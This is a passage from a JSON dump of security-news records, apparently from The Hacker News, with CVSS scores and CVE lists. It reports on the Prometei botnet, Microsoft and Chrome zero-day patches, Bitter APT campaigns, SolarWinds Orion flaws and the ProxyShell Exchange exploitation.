botnet may have been around as early as May 2016, implying that the malware has constantly been evolving ever since, adding new modules and techniques to its capabilities.\n\nPrometei has been observed in a multitude of victims spanning across finance, insurance, retail, manufacturing, utilities, travel, and construction sectors, compromising networks of entities located in the U.S., U.K., and several countries in Europe, South America, and East Asia, while also explicitly avoiding infecting targets in former [Soviet bloc](<https://en.wikipedia.org/wiki/Eastern_Bloc>) countries.\n\nNot much is known about the attackers other than the fact that they are Russian speaking, with older versions of Prometei having their language code set as \"Russian.\" A separate Tor client module used to communicate with a Tor C2 server included a configuration file that's configured to avoid using several exit nodes located in Russia, Ukraine, Belarus, and Kazakhstan.\n\n\"Threat actors in the cybercrime community continue to adopt APT-like techniques and improve efficiency of their operations,\" Rochberger said. \"As observed in the recent Prometei attacks, the threat actors rode the wave of the recently discovered Microsoft Exchange vulnerabilities and exploited them in order to penetrate targeted networks.\"\n\n\"This threat poses a great risk for organizations, since the attackers have absolute control over the infected machines, and if they wish so, they can steal information, infect the endpoints with other malware or even collaborate with ransomware gangs by selling the access to the infected endpoints,\" she added.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-23T07:42:00", "type": "thn", "title": "Prometei Botnet Exploiting Unpatched Microsoft Exchange Servers", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-04-23T15:00:17", "id": "THN:F2A3695D04A2484E069AC407E754A9C1", "href": "https://thehackernews.com/2021/04/prometei-botnet-exploiting-unpatched.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:02", "description": "[](<https://thehackernews.com/images/-B1GIJUi-Xfc/YEhXRdorEMI/AAAAAAAAB_o/0vVWsLXOqu0OjfRxUmUTUUvsoLhkTBy6QCLcBGAsYHQ/s0/windows-update-download.jpg>)\n\nMicrosoft plugged as many as [89 security flaws](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Mar>) as part of its monthly Patch Tuesday updates released today, including fixes for an actively exploited zero-day in Internet Explorer that could permit an attacker to run arbitrary code on target machines.\n\nOf these flaws, 14 are listed as Critical, and 75 are listed as Important in severity, out of which two of the bugs are described as publicly known, while five others have been reported as under active attack at the time of release.\n\nAmong those five security issues are a clutch of vulnerabilities known as [ProxyLogon](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) that allows adversaries to break into Microsoft Exchange Servers in target environments and subsequently allow the installation of unauthorized web-based backdoors to facilitate long-term access.\n\nBut in the wake of Exchange servers coming under [indiscriminate assault](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>) toward the end of February by multiple threat groups looking to exploit the vulnerabilities and plant backdoors on corporate networks, Microsoft took the unusual step of releasing out-of-band fixes a week earlier than planned.\n\nThe ramping up of [mass exploitation](<https://krebsonsecurity.com/2021/03/warning-the-world-of-a-ticking-time-bomb/>) after Microsoft released its updates on March 2 has led the company to deploy [another series of security updates](<https://techcommunity.microsoft.com/t5/exchange-team-blog/march-2021-exchange-server-security-updates-for-older-cumulative/ba-p/2192020>) targeting [older and unsupported](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) cumulative updates that are vulnerable to ProxyLogon attacks.\n\nAlso included in the mix is a patch for zero-day in Internet Explorer (CVE-2021-26411) that was discovered as exploited by North Korean hackers to [compromise security researchers](<https://thehackernews.com/2021/01/n-korean-hackers-targeting-security.html>) working on vulnerability research and development earlier this year.\n\nSouth Korean cybersecurity firm ENKI, which publicly [disclosed](<https://thehackernews.com/2021/02/new-chrome-browser-0-day-under-active.html>) the flaw early last month, claimed that North Korean nation-state hackers made an unsuccessful attempt at targeting its security researchers with malicious MHTML files that, when opened, downloaded two payloads from a remote server, one of which contained a zero-day against Internet Explorer.\n\nAside from these actively exploited vulnerabilities, the update also corrects a number of remote code execution (RCE) flaws in Windows DNS Server (CVE-2021-26877 and CVE-2021-26897, CVSS scores 9.8), Hyper-V server (CVE-2021-26867, CVSS score 9.9), SharePoint Server (CVE-2021-27076, CVSS score 8.8), and Azure Sphere (CVE-2021-27080, CVSS score 9.3).\n\nCVE-2021-26877 and CVE-2021-26897 are notable for a couple of reasons. First off, the flaws are rated as \"exploitation more likely\" by Microsoft, and are categorized as zero-click vulnerabilities of low attack complexity that require no user interaction.\n\nAccording to [McAfee](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/seven-windows-wonders-critical-vulnerabilities-in-dns-dynamic-updates/>), the vulnerabilities stem from an out of bounds read (CVE-2021-26877) and out of bounds write (CVE-2021-26897) on the heap, respectively, during the processing of [Dynamic Update](<https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/configure-dns-dynamic-updates-windows-server-2003>) packets, resulting in potential arbitrary reads and RCE.\n\nFurthermore, this is also the second time in a row that Microsoft has addressed a critical RCE flaw in Windows DNS Server. Last month, the company rolled out a fix for [CVE-2021-24078](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) in the same component which, if unpatched, could permit an unauthorized party to execute arbitrary code and potentially redirect legitimate traffic to malicious servers.\n\nTo install the latest security updates, Windows users can head to Start &gt; Settings &gt; Update &amp; Security &gt; Windows Update, or by selecting Check for Windows updates.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-10T05:37:00", "type": "thn", "title": "Microsoft Issues Security Patches for 89 Flaws \u2014 IE 0-Day Under Active Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24078", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-26867", "CVE-2021-26877", "CVE-2021-26897", "CVE-2021-27065", "CVE-2021-27076", "CVE-2021-27080"], "modified": "2021-08-13T09:07:37", "id": "THN:BC8A83422D35DB5610358702FCB4D154", "href": "https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:08", "description": "[](<https://thehackernews.com/images/-pOCXw5Vbz4E/YCNjQpEwYHI/AAAAAAAABuA/DON2kef7nngGbrXuKE_q5XlYxFXBjgnbQCLcBGAsYHQ/s0/microsoft-windows-update.jpg>)\n\nMicrosoft on Tuesday [issued fixes for 56 flaws](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Feb>), including a critical vulnerability that's known to be actively exploited in the wild.\n\nIn all, 11 are listed as Critical, 43 are listed as Important, and two are listed as Moderate in severity \u2014 six of which are previously disclosed vulnerabilities.\n\nThe updates cover .NET Framework, Azure IoT, Microsoft Dynamics, Microsoft Edge for Android, Microsoft Exchange Server, Microsoft Office, Microsoft Windows Codecs Library, Skype for Business, Visual Studio, Windows Defender, and other core components such as Kernel, TCP/IP, Print Spooler, and Remote Procedure Call (RPC).\n\n### A Windows Win32k Privilege Escalation Vulnerability\n\nThe most critical of the flaws is a Windows Win32k privilege escalation vulnerability (CVE-2021-1732, CVSS score 7.8) that allows attackers with access to a target system to run malicious code with elevated permissions. Microsoft credited JinQuan, MaDongZe, TuXiaoYi, and LiHao of DBAPPSecurity for discovering and reporting the vulnerability.\n\nIn a separate technical write-up, the researchers said a zero-day exploit leveraging the flaw was detected in a \"very limited number of attacks\" against victims located in China by a threat actor named Bitter APT. The attacks were discovered in December 2020.\n\n\"This zero-day is a new vulnerability which caused by win32k callback, it could be used to escape the sandbox of Microsoft [Internet Explorer] browser or Adobe Reader on the latest Windows 10 version,\" DBAPPSecurity researchers [said](<https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>). \"The vulnerability is high quality and the exploit is sophisticated.\"\n\nIt's worth noting that Adobe, as part of its February patch, [addressed](<https://helpx.adobe.com/security/products/acrobat/apsb21-09.html>) a critical buffer overflow flaw in Adobe Acrobat and Reader for Windows and macOS (CVE-2021-21017) that it said could lead to arbitrary code execution in the context of the current user.\n\nThe company also warned of active exploitation attempts against the bug in the wild in limited attacks targeting Adobe Reader users on Windows, mirroring aforementioned findings from DBAPPSecurity.\n\nWhile neither Microsoft nor Adobe has provided additional details, the concurrent patching of the two flaws raises the possibility that the vulnerabilities are being chained to carry out the in-the-wild attacks.\n\n### Netlogon Enforcement Mode Goes Into Effect\n\nMicrosoft's Patch Tuesday update also resolves a number of remote code execution (RCE) flaws in Windows DNS Server (CVE-2021-24078), .NET Core, and Visual Studio (CVE-2021-26701), Microsoft Windows Codecs Library (CVE-2021-24081), and Fax Service (CVE-2021-1722 and CVE-2021-24077).\n\nThe RCE in Windows DNS server component is rated 9.8 for severity, making it a critical vulnerability that, if left unpatched, could permit an unauthorized adversary to execute arbitrary code and potentially redirect legitimate traffic to malicious servers.\n\nMicrosoft is also taking this month to push second round of fixes for the [Zerologon](<https://thehackernews.com/2020/09/detecting-and-preventing-critical.html>) flaw (CVE-2020-1472) that was originally resolved in August 2020, following which [reports of active exploitation](<https://twitter.com/MsftSecIntel/status/1308941504707063808>) targeting unpatched systems emerged in September 2020.\n\nStarting February 9, the domain controller \"[enforcement mode](<https://msrc-blog.microsoft.com/2021/01/14/netlogon-domain-controller-enforcement-mode-is-enabled-by-default-beginning-with-the-february-9-2021-security-update-related-to-cve-2020-1472/>)\" will be [enabled by default](<https://support.microsoft.com/help/4557222#EnablingEnforcementMode>), thus blocking \"vulnerable [Netlogon] connections from non-compliant devices.\"\n\nIn addition, the Patch Tuesday update rectifies two information disclosure bugs \u2014 one in Edge browser for Android (CVE-2021-24100) that could have revealed personally identifiable information and payment information of a user, and the other in Microsoft Teams for iOS (CVE-2021-24114) that could have exposed the Skype token value in the preview URL for images in the app.\n\n### RCE Flaws in Windows TCP/IP Stack\n\nLastly, the Windows maker released a set of fixes affecting its TCP/IP implementation \u2014 consisting of two RCE flaws (CVE-2021-24074 and CVE-2021-24094) and one denial of service vulnerability (CVE-2021-24086) \u2014 that it said could be exploited with a DoS attack.\n\n\"The DoS exploits for these CVEs would allow a remote attacker to cause a stop error,\" Microsoft [said](<https://msrc-blog.microsoft.com/2021/02/09/multiple-security-updates-affecting-tcp-ip/>) in an advisory. \"Customers might receive a blue screen on any Windows system that is directly exposed to the internet with minimal network traffic. Thus, we recommend customers move quickly to apply Windows security updates this month.\"\n\nThe tech giant, however, noted that the complexity of the two TCP/IP RCE flaws would make it hard to develop functional exploits. But it expects attackers to create DoS exploits much more easily, turning the security weakness into an ideal candidate for exploitation in the wild.\n\nTo install the latest security updates, Windows users can head to Start &gt; Settings &gt; Update &amp; Security &gt; Windows Update or by selecting Check for Windows updates.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-02-10T04:44:00", "type": "thn", "title": "Microsoft Issues Patches for In-the-Wild 0-day and 55 Others Windows Bugs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2021-1722", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-24074", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24081", "CVE-2021-24086", "CVE-2021-24094", "CVE-2021-24100", "CVE-2021-24114", "CVE-2021-26701"], "modified": "2021-02-15T11:58:01", "id": "THN:0C87C22B19E7073574F7BA69985A07BF", "href": "https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-12T02:22:45", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgx6lZB3oJ9X1sLlKCznoOeSkcDGdxDDzLpQUslIFxcqcdMH_UDcAqH4PjZiqkCxL4jI-B00Zx79nco8uEEf5XiuDqkexKPHK5G1oPT3v5UXngC8t4QHYPLfIhQTOw0d5FZR2WUXYg38_ydmYOd8biQq4tgAK_UHmsEyzslVH8sLV19IMC1QE6NMR95/s728-e100/hacker-code.jpg>)\n\nAn espionage-focused threat actor known for targeting China, Pakistan, and Saudi Arabia has expanded to set its sights on Bangladeshi government organizations as part of an ongoing campaign that commenced in August 2021.\n\nCybersecurity firm Cisco Talos attributed the activity with moderate confidence to a hacking group dubbed the [Bitter APT](<https://malpedia.caad.fkie.fraunhofer.de/details/win.bitter_rat>) based on overlaps in the command-and-control (C2) infrastructure with that of prior campaigns mounted by the same actor.\n\n\"Bangladesh fits the profile we have defined for this threat actor, previously targeting Southeast Asian countries including [China](<https://www.anomali.com/blog/suspected-bitter-apt-continues-targeting-government-of-china-and-chinese-organizations>), Pakistan, and Saudi Arabia,\" Vitor Ventura, lead security researcher at Cisco Talos for EMEA and Asia, [told](<https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html>) The Hacker News.\n\n\"And now, in this latest campaign, they have widened their reach to Bangladesh. Any new country in southeast Asia being targeted by Bitter APT shouldn't be of surprise.\"\n\nBitter (aka APT-C-08 or T-APT-17) is suspected to be a South Asian hacking group motivated primarily by intelligence gathering, an operation that's facilitated by means of malware such as BitterRAT, ArtraDownloader, and AndroRAT. Prominent targets include the energy, engineering, and government sectors.\n\nThe earliest attacks distributing the mobile version of BitterRAT date back to September 2014, with the actor having a history of leveraging zero-day flaws \u2014 [CVE-2021-1732](<https://blog.cyble.com/2021/02/24/bitter-apt-enhances-its-capability-with-windows-kernel-zero-day-exploit/>) and [CVE-2021-28310](<https://thehackernews.com/2021/04/nsa-discovers-new-vulnerabilities.html>) \u2014 to its advantage and accomplishing its adversarial objectives.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEje8jC-uVfJtCg-HT90ER0XL1ynji-bMSmKY4TsMgVZDJ4BUis2Ee9BqhaK1IgRgN3C39Ble5vyCaoUWCWOSw_sCPSi1K1pqxhfFDtU7-XFOlKQELXIUmacfXYgeFx_YhnGNvj-1DRRGm2mRliJTxxHv8CqVxw48P0ghcuKJ0YObfTzh23rHBy_Bz3i/s728-e100/talos.jpg>)\n\nThe latest campaign, targeting an elite entity of the Bangladesh government, involves sending spear-phishing emails to high-ranking officers of the Rapid Action Battalion Unit of the Bangladesh police (RAB).\n\nAs is typically observed in other social engineering attacks of this kind, the missives are designed to lure the recipients into opening a weaponized RTF document or a Microsoft Excel spreadsheet that exploits previously known flaws in the software to deploy a new trojan dubbed \"ZxxZ.\"\n\nZxxZ, named so after a separator used by the malware when sending information back to the C2 server, is a 32-bit Windows executable compiled in Visual C++.\n\n\"The trojan masquerades as a Windows Security update service and allows the malicious actor to perform remote code execution, allowing the attacker to perform any other activities by installing other tools,\" the researchers explained.\n\nWhile the malicious RTF document exploits a memory corruption vulnerability in Microsoft Office's Equation Editor ([CVE-2017-11882](<https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html>)), the Excel file abuses two remote code execution flaws, [CVE-2018-0798](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2018-0798>) and [CVE-2018-0802](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2018-0802>), to activate the infection sequence.\n\n\"Actors often change their tools to avoid detection or attribution, this is part of the lifecycle of a threat actor showing its capability and determination,\" Ventura said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-11T12:37:00", "type": "thn", "title": "Bitter APT Hackers Add Bangladesh to Their List of Targets in South Asia", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802", "CVE-2021-1732", "CVE-2021-28310"], "modified": "2022-05-12T01:27:46", "id": "THN:75586AE52D0AAF674F942498C96A2F6A", "href": "https://thehackernews.com/2022/05/bitter-apt-hackers-add-bangladesh-to.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:02", "description": "[](<https://thehackernews.com/images/-tnjJ0FH8P0I/YEwt7ddHBcI/AAAAAAAACB8/2lR87aM5jBAUOKikDOdI3SWSC9ZG92FcgCLcBGAsYHQ/s0/chrome-browser-update.jpg>)\n\nGoogle has addressed yet another actively exploited zero-day in Chrome browser, marking the second such fix released by the company within a month.\n\nThe browser maker on Friday shipped 89.0.4389.90 for Windows, Mac, and Linux, which is expected to be rolling out over the coming days/weeks to all users.\n\nWhile the update contains a total of five security fixes, the most important flaw rectified by Google concerns a [use after free](<https://cwe.mitre.org/data/definitions/416.html>) vulnerability in its Blink rendering engine. The bug is tracked as CVE-2021-21193.\n\nDetails about the flaw are scarce except that it was reported to Google by an anonymous researcher on March 9.\n\nAccording to IBM, the vulnerability is rated 8.8 out of 10 on the CVSS scale, and could allow a remote attacker to execute arbitrary code on the target system. \"By persuading a victim to visit a specially crafted Web site, a remote attacker could exploit this vulnerability to execute arbitrary code or cause a denial of service condition on the system,\" the report stated.\n\nAs is usually the case with actively exploited flaws, Google issued a terse statement acknowledging that an exploit for CVE-2021-21193 existed but refrained from sharing additional information until a majority of users are updated with the fixes and prevent other threat actors from creating exploits targeting this zero-day.\n\n[](<https://thehackernews.com/images/-4e8UqaJKLag/YEwrYTe6kaI/AAAAAAAACB0/A61b0Tzs5nIymspbYAAIoURKA3zV5lE2QCLcBGAsYHQ/s0/chrome-zero-day.jpg>)\n\n\"Google is aware of reports that an exploit for CVE-2021-21193 exists in the wild,\" Chrome Technical Program Manager Prudhvikumar Bommana [noted](<https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_12.html>) in a blog post.\n\nWith this update, Google has fixed three zero-day flaws in Chrome since the start of the year.\n\nEarlier this month, the company issued a fix for an \"object lifecycle issue in audio\" (CVE-2021-21166) which it said was being actively exploited. Then on February 4, the company resolved another actively-exploited heap buffer overflow flaw (CVE-2021-21148) in its V8 JavaScript rendering engine.\n\nChrome users can update to the latest version by heading to Settings &gt; Help &gt; About Google Chrome to mitigate the risk associated with the flaw.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-13T03:16:00", "type": "thn", "title": "Another Google Chrome 0-Day Bug Found Actively Exploited In-the-Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193"], "modified": "2021-03-16T04:51:58", "id": "THN:15BF409706D7240A5276C705732D745F", "href": "https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:24", "description": "[](<https://thehackernews.com/images/-GFgjq7qp1cE/YF1q7HbWVxI/AAAAAAAACGg/dV7zI2KVO_c_JeEBnNPbQvFkpEb9fJqrQCLcBGAsYHQ/s0/solarwinds-orion-vulnerability.jpg>)\n\nIT infrastructure management provider SolarWinds on Thursday released a new update to its Orion networking monitoring tool with fixes for four security vulnerabilities, counting two weaknesses that could be exploited by an authenticated attacker to achieve remote code execution (RCE).\n\nChief among them is a JSON deserialization flaw that allows an authenticated user to execute arbitrary code via the [test alert actions](<https://documentation.solarwinds.com/en/Success_Center/orionplatform/content/core-testing-alerts-sw1106.htm>) feature available in the Orion Web Console, which lets users simulate network events (e.g., an unresponsive server) that can be configured to trigger an alert during setup. It has been rated critical in severity.\n\nA second issue concerns a high-risk vulnerability that could be leveraged by an adversary to achieve RCE in the Orion Job Scheduler. \"In order to exploit this, an attacker first needs to know the credentials of an unprivileged local account on the Orion Server,\" SolarWinds [said](<https://documentation.solarwinds.com/en/Success_Center/orionplatform/Content/Release_Notes/Orion_Platform_2020-2-5_release_notes.htm>) in its release notes.\n\nThe advisory is light on technical specifics, but the two shortcomings are said to have been reported via Trend Micro's Zero Day Initiative.\n\n[](<https://thehackernews.com/images/-7aYws8KQwm4/YF1na64c3wI/AAAAAAAACGY/2xeUC0p9gpMkjpH1IOa2yeICs00934H0gCLcBGAsYHQ/s0/cve.jpg>)\n\nBesides the aforementioned two flaws, the update squashes two other bugs, including a high-severity stored cross-site scripting (XSS) vulnerability in the \"add custom tab\" within customize view page (CVE-2020-35856) and a reverse tabnabbing and open redirect vulnerability in the custom menu item options page (CVE-2021-3109), both of which require an Orion administrator account for successful exploitation.\n\nThe new update also brings a number of security improvements, with fixes for preventing XSS attacks and enabling UAC protection for Orion database manager, among others.\n\nThe latest round of fixes arrives almost two months after the Texas-based company addressed [two severe security vulnerabilities](<https://thehackernews.com/2021/02/3-new-severe-security-vulnerabilities.html>) impacting Orion Platform (CVE-2021-25274 and CVE-2021-25275), which could have been exploited to achieve remote code execution with elevated privileges.\n\nOrion users are recommended to update to the latest release, \"Orion Platform 2020.2.5,\" to mitigate the risk associated with the security issues.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-26T05:07:00", "type": "thn", "title": "Another Critical RCE Flaw Discovered in SolarWinds Orion Platform", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-35856", "CVE-2021-25274", "CVE-2021-25275", "CVE-2021-3109"], "modified": "2021-03-26T05:07:54", "id": "THN:1628F014C29F23FB8C8FF7EBC7ADC137", "href": "https://thehackernews.com/2021/03/solarwinds-orion-vulnerability.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:14", "description": "[](<https://thehackernews.com/images/-4bW5O7qDy3g/YRY939zQM4I/AAAAAAAADho/RUV3iIGj654Ml8xKhGo8MXIEWtGwsL1ywCLcBGAsYHQ/s0/ms-exchnage.jpg>)\n\nThreat actors are actively carrying out opportunistic [scanning](<https://twitter.com/bad_packets/status/1425598895569006594>) and [exploitation](<https://twitter.com/GossiTheDog/status/1425844380376735746>) of Exchange servers using a new exploit chain leveraging a trio of flaws affecting on-premises installations, making them the latest set of bugs after ProxyLogon vulnerabilities were exploited en masse at the start of the year.\n\nThe remote code execution flaws have been collectively dubbed \"ProxyShell.\" At least 30,000 machines are affected by the vulnerabilities, [according](<https://isc.sans.edu/diary/27732>) to a Shodan scan performed by Jan Kopriva of SANS Internet Storm Center.\n\n\"Started to see in the wild exploit attempts against our honeypot infrastructure for the Exchange ProxyShell vulnerabilities,\" NCC Group's Richard Warren [tweeted](<https://twitter.com/buffaloverflow/status/1425831100157349890>), noting that one of the intrusions resulted in the deployment of a \"C# aspx webshell in the /aspnet_client/ directory.\"\n\nPatched in early March 2021, [ProxyLogon](<https://devco.re/blog/2021/08/06/a-new-attack-surface-on-MS-exchange-part-1-ProxyLogon/>) is the moniker for CVE-2021-26855, a server-side request forgery vulnerability in Exchange Server that permits an attacker to take control of a vulnerable server as an administrator, and which can be chained with another post-authentication arbitrary-file-write vulnerability, CVE-2021-27065, to achieve code execution.\n\nThe vulnerabilities came to light after 